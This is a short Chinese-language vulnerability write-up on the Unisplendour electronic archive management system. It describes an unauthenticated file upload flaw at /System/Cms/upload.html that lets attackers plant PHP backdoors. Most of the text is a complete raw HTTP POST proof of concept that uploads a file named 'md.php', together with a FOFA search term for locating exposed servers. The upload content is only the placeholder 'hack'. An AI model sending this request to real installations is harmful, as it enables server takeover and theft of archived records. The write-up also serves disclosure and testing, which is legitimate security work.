紫光档案管理系统文件上传漏洞

漏洞描述

紫光电子档案管理系统上传接口/System/Cms/upload.html存在未授权访问，导致任意文件上传漏洞，恶意攻击者可以直接上传恶意PHP后门文件，恶意PHP代码能够解析执行造成主机权限丢失，严重威胁系统以及数据相关安全。

漏洞复现

FOFA

紫光档案管理系统

POC

POST /System/Cms/upload.html?token= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 554
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3enKbCUwg60aGZcr

------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="userID"

admin
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="fondsid"

1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="comid"

1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="token"

1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="files[]"; filename="md.php"

hack
------WebKitFormBoundary3enKbCUwg60aGZcr--

上传成功

访问查看